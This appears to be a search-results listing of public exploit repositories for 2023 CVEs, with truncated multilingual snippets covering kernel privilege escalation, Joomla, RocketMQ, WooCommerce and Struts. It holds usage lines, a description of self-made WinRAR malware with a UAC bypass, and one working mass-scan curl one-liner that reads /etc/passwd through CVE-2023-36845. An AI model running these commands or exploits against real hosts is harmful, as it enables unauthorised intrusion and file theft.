127503 matches found
CVE-2023-36884-Checker
CVE-2023-36884-Checker Script para verificar o hardening do CVE-2023-36884 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884 Objetivo Este script verifica se as recomendações de hardening da Microsoft estão aplicadas corretamente. A Microsoft afirma...
BAD-WEBP-CVE-2023-4863
BAD-WEBP-CVE-2023-4863...
apollo-koa-minimal
CVE-2023-26144...
nftables-oob-read-write-exploit-CVE-2023-35001-
nftables oob read/write exploit CVE-2023-35001 Exploit usato al pwn2own Vancouver 2023 su Ubuntu desktop. L'exploit supporta la versione del kernel disponibile all'inizio dell'evento 5.19.0-35. Requisiti Compilatore C Compilatore Go Uso root@kitploit: Build $ make Run $ ./exploit Questo produce u...
Nuclei-Template-CVE-2023-42793.yaml
Questo repository non contiene un README...
CVE-2023-0386
التثبيت root@kitploit: make all طريقة الاستخدام افتح طرفيتين، وفي الأولى اكتب root@kitploit: ./fuse ./ovlcap/lower ./gc وفي الطرفية الثانية اكتب root@kitploit: ./exp...
CVE-2023-23752
CVE-2023-23752 semplice script bash per CVE-2023-23752 joomla CMS Puoi usare l'opzione -u per specificare un singolo URL o l'opzione -l per fornire un file contenente un elenco di URL per testare l'endpoint vulnerabile. Questo script salva tutti i dati delle risposte HTTP e mostra le informazioni...
CVE-2023-28343
CVE-2023-28343 Exploit POC CVE-2023-28343 Utilizzo root@kitploit: usage: exploit.py -h -t TARGET -l LOCALHOST -p LOCALPORT optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET Target url, http://localhost:9000 -l LOCALHOST, --localhost LOCALHOST Local IP addre...
Apache-RocketMQ-CVE-2023-33246-
CVE-2023-33246: Apache RocketMQ Remote Code Execution ÜBERBLICK Apache RocketMQ ist eine der beliebtesten und am weitesten verbreiteten Plattformen für verteiltes Messaging und Streaming. Kürzlich wurde eine Befehlsausführungslücke in Apache RocketMQ gemeldet, die die Version 5.1.0 und darunter...
chrome-CVE-2023-4357
chrome-CVE-2023-4357...
CVE-2023-28121
CVE-2023-28121 root@kitploit: usage: CVE-2023-28121.py -h -v RHOST RPORT WooCommerce Payments WordPress plugin = 5.6.1 CVE-2023-28121 PoC. Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-28121 positional arguments: RHOST remote host RPORT remote port optional arguments: -h, --help show this...
Apache-Dubbo-CVE-2023-23638-exp
Per uno scanner di vulnerabilità Dubbo più completo, vedi il mio altro progetto: https://github.com/YYHYlh/Dubbo-Scan Apache-Dubbo-CVE-2023-23638-exp Pratica ingegneristica dello sfruttamento della vulnerabilità Apache Dubbo CVE-2023-23638, copre l'intero processo da discovery del servizio a...
CVE-2023-29489
Exploit CVE-2023-29489 Questo script può sfruttare molti siti web tramite CVE-2023-29489 vulnerabilità XSS Utilizzo root@kitploit: python3 CVE-2023-29489.py list.txt Il mio canale :...
CVE-2023-7028
CVE-2023-7028lab Implementazione e sfruttamento della vulnerabilità di account takeover CVE-2023-7028 relativa agli articoli settimanali GO-TO CVE dell'undicesima settimana. Questo repository contiene un setup Docker e uno script Python per testare la vulnerabilità CVE-2023-7028 in GitLab. Lo...
VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC
VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC Questo è il mio malware. Utilizzo la CVE 2023-38831, un tipo di exploit su WinRAR, per realizzare questo malware. Uso anche BypassUAC per ottenere i privilegi di amministratore. Questo è il file OVA del malware:...
CVE-2023-50164-POC
Questo è un Proof of Concept PoC per CVE-2023-50164, che descrive una nuova vulnerabilità di path traversal che può portare a Remote Code Execution RCE in struts-core. Per risolvere il problema, si consiglia di aggiornare a Struts 2.5.33 o Struts 6.3.0.2 o versioni successive. Questo repository s...
cve-2023-28244
cve-2023-28244...
CVE-2023-36845
CVE-2023-36845 Controllo massivo one-liner CVE-2023-36845 cat ip.txt| while read host do;do curl -sk "http://$host/?PHPRC=/dev/fd/0" -X POST -d 'autoprependfile="/etc/passwd"'| grep -i 'root:' && echo $host "is VULNERABLE";done...
looney-tuneables
looney-tuneables CVE-2023-4911 Installa pwntools: https://github.com/Gallopsled/pwntools root@kitploit: apt-get update apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade pwntools...